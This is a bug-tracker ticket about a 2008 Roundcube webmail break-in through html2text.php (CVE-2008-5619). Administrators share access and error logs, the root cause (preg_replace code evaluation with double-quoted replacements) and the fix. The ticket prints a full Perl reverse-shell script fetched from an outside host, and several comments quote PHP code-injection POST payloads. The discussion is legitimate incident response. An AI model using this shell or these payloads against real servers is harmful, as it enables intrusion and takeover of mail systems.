Opened 5 years ago

Closed 5 years ago

Last modified 4 years ago

#1485618 closed Bugs (fixed)

Break-in possiblity via html2text.php?

Reported by: RealMurphy Owned by:
Priority: 10 - Lowest Milestone: later
Component: Security Version: 0.2-beta
Severity: minor Keywords: security
Cc: pnfisher@…

Description (last modified by till)

Hi all,

since I cannot reproduce this I try to describe this problem from the current installation status and not against trunk (sorry for that).

Last night someone broke into my apache-container via roundcube (99.9% sure here), the system is a current Debian Lenny, with these versions:

roundcube 0.2-beta
PHP is 5.2.6
mailserver is postfix on a remote virtual server

In the logs I have found the following:

apache's access.log:

192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

192.168.100.2 is another webserver acting as a proxy to this webmail apache (i.e. just rewriting and forwarding the requests), the real IP was

200.171.152.187 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "
Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "
Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "G
ooglebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 502 595 "-"
"Googlebot/2.1 ( http://www.google.com/bot.html)"

In the error log I see this nasty bit at the same time:

--2008-12-08 23:05:16--  http://mmbt.co.uk/img/back.txt
Resolving mmbt.co.uk... 81.31.121.138
Connecting to mmbt.co.uk|81.31.121.138|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 541 [text/plain]
Saving to: `back.txt.1'

     0K                                                       100% 56.0M=0s

2008-12-08 23:05:16 (56.0 MB/s) - `back.txt.1' saved [541/541]

For completeness this is the script which was downloaded:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

There is nothing in either console, errors or sendmail in roundcubes log messages.

Since I believe this is potentially dangerous (and this incident happened to put my box onto several blacklist for sending out >50k spam emails) I've bumbed up the severity.

Anything else you could need from me?

Cheers

Carsten

Change History (20)

comment:1 Changed 5 years ago by alec

  • Component changed from PHP backend to Security issue
  • Milestone changed from later to 0.2-stable

comment:2 Changed 5 years ago by ziba

bin/html2text.php does use html_entity_decode which had a security issue:
http://www.juniper.net/security/auto/vulnerabilities/vuln17296.html

but that was supposed to be fixed in PHP 5.1.3-RC1

comment:3 Changed 5 years ago by ksteinhoff

Why do you suspect html2text.php? The time stamp on error log entry you quote is 23:05:16 and the time stamps in your transfer log lines begin at 23:07:50.

comment:4 Changed 5 years ago by RealMurphy

OK, trying to do it better this time. html2text.php was the only call with POST data. unless I'm mistaken with a GET you will not be able to break into a system right? The initial copy & paste was not covering the full log file, sorry about that. This is the full access.log

192.168.100.2 - - [08/Dec/2008:17:41:46 +0100] "GET /roundcube/skins/default/images/display/info.png HTTP/1.1" 200 2162 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:55 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:59 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 88 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:38 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "http://www.google.com/search?hl=en&q=intitle:%22RoundCube+Webmail%22+site:com&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:27 +0100] "GET /roundcube/skins/default/images/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/skins/default/common.css HTTP/1.1" 200 6680 "https://myhost/roundcube/"
 "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/program/js/common.js HTTP/1.1" 200 16650 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:29 +0100] "GET /roundcube/program/js/app.js HTTP/1.1" 200 110423 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/roundcube_logo.png HTTP/1.1" 200 4868 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/listheader_aqua.gif HTTP/1.1" 200 270 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/buttons/bg.gif HTTP/1.1" 200 211 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:40 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:41 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:06:55:28 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:12:56:27 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

comment:5 Changed 5 years ago by estadtherr

If I understand the description, a vulnerability in html2text.php allowed an attacker to cause your web server to download a malicious perl script (is back.txt the perl script or is back.txt yet another file?) This perl script opens a socket to a host/port specified on its command line and hooks a command shell's input/output to that socket. Through this remote shell, the attacker was able to send out spam from your server.

How did the attacker get the perl script to execute? Are there two vulnerabilities, i.e. allowing a download and allowing execution of an arbitrary script?

comment:6 Changed 5 years ago by RealMurphy

It looks like back.txt is the local file name of the perlscript. Since I just see the wget output and not the command line it's hard to tell. wget downloaded this file to /tmp and also a zip file named jess.zip which I yet have to figure out what this one does (sorry for not mentioning this earlier, I forgot to look where back.txt would be on the system):

webmail:/tmp# file jess.zip
jess.zip: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
webmail:/tmp# ldd jess.zip
        not a dynamic executable

Of course this is not a zip file but a root exploit, running strings shows:

Linux vmsplice Local Root Exploit
 By qaaz
!@#$

OK, rounding it up again: It seems that the multiple POST requests were used to downlaod the perl script, the root exploit and was possibly also used for starting it, however, that part I still don't know how they might have achieved it - but my knowledge there is rather limited.

comment:7 Changed 5 years ago by till

  • Description modified (diff)
  • Keywords security added

comment:8 Changed 5 years ago by till

That's interesting and we haven't really analyzed this yet, but the quickfix to this issue is to install mod_security on the server. GotRoot has a bunch of filter rules and they catch this stuff easily.

Not the solution to the problem, but a workaround.

Thanks for reporting!

comment:9 Changed 5 years ago by alec

  • Resolution set to fixed
  • Status changed from new to closed

Found vulnerable preg_replace() use. Fixed in [f50cc72c], but we'll know for sure when we get POST data used for attack. Closing the ticket now.

comment:10 Changed 5 years ago by RealMurphy

I'm still running 0.2-beta as a kind of honeypot. During the night from Saturday to Sunday someone tried again the same hack, but this line did not really lock much:

file_put_contents('/var/log/roundcube/hack', date('r').': '.print_r($_REQUEST, true)."\n", FILE_APPEND);

The result:

Sun, 21 Dec 2008 02:42:28 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:32 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:54 +0100: Array
(
)

Apache log lines:

192.168.100.2 - - [21/Dec/2008:02:42:27 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:32 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:54 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

I leave this issue closed but may add more info on the exploit if I get some

comment:11 Changed 5 years ago by alec

check variables_order in php.ini and set to "GPC"

comment:12 Changed 5 years ago by RealMurphy

Done, waiting for next attack

comment:13 Changed 5 years ago by pnfisher

  • Cc pnfisher@… added

We had someone probe our system for the html2text.php exploit today. I've removed the "Host" header, which was properly set.

POST /rc/bin/html2text.php HTTP/1.1
Pragma: no-cache
Accept: */*
Content-Type: ''
Connection: Keep-Alive
Content-Length: 28

<b>{${system(uname -a)}}</b>

comment:14 Changed 5 years ago by alec

This bug is known as CVE-2008-5619

comment:15 Changed 5 years ago by paul

We were also attacked through html2text.php. The hacker tried to install a backdoor, probably using 'b{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}/b' as postdata, as explained on http://zastita.com/015038/roundcube-webmail-.html.
In the announcement of the security update for Roundcube 0.2 Beta, you might have mentioned that 0.1 Stable was also vulnerable.

comment:16 follow-up: Changed 5 years ago by stuge

A customer of mine was also hit by this.

While [f50cc72c] fixes the problem in a perfectly safe manner and also adds proper handling for multibyte characters (excellent!) no analysis I have read so far has been completely correct about what is really going on.

preg_replace() with the e modifier allows execution of PHP code, but that's not the problem.

Before the superior fix in [f50cc72c], the problem was how entries in the html2text::$replace array were written like so:

      'strtoupper("\\1")',                    // <b>

instead of:

      'strtoupper(\'\\1\')',                    // <b>

When using double quotes in the strtoupper() call, any text which is replaced into there from the POST data can contain Complex strings and will have those complex strings processed by PHP, when the entire argument really must be handled as untrusted input.

Using single quotes clarifies to the PHP interpreter that this is data which should not be processed further, so any complex strings will be ignored.

comment:17 in reply to: ↑ 16 Changed 5 years ago by stuge

Replying to stuge:

no analysis I have read so far has been completely correct about what is really going on.

To be fair, Jacobo Avariento Gimeno at Sofistic described the problem accurately, but didn't point out the double quotes in the function call.

comment:18 Changed 4 years ago by gittar

  • Milestone changed from 0.2-stable to later
  • Priority changed from 5 to 10 - Lowest
  • Severity changed from critical to minor

Well I think you are lucky to read the logs time and identified the script, I found many people who are totally unaware of the fact that there is a script running on their mail server to send spam mails. I think you need to check the server cache for this purpose, there might be any other activity (unusual) on the server like increasing page impression or comparing bandwidth of the two consecutive days of that time. I would like to suggest you avg download to avoid these situations. Thanks

comment:20 Changed 4 years ago by alec

  • Milestone set to later
  • Version set to 0.2-beta

Re-assigned Milestone and Version

comment:21 Changed 4 years ago by tbbw

I can confirm that ppl have started to make auto infection scripts for this vuln.
Just yesterday i'we got a perl irc bot thru this hole that got it's nest on undernet.
some .ro kiddys farming.

They scan common webmail locations so until this is fixed it's best to change ur webmail url to something cryptic instead of myhost.com/webmail or myhost.com/mail

Note: See TracTickets for help on using tickets.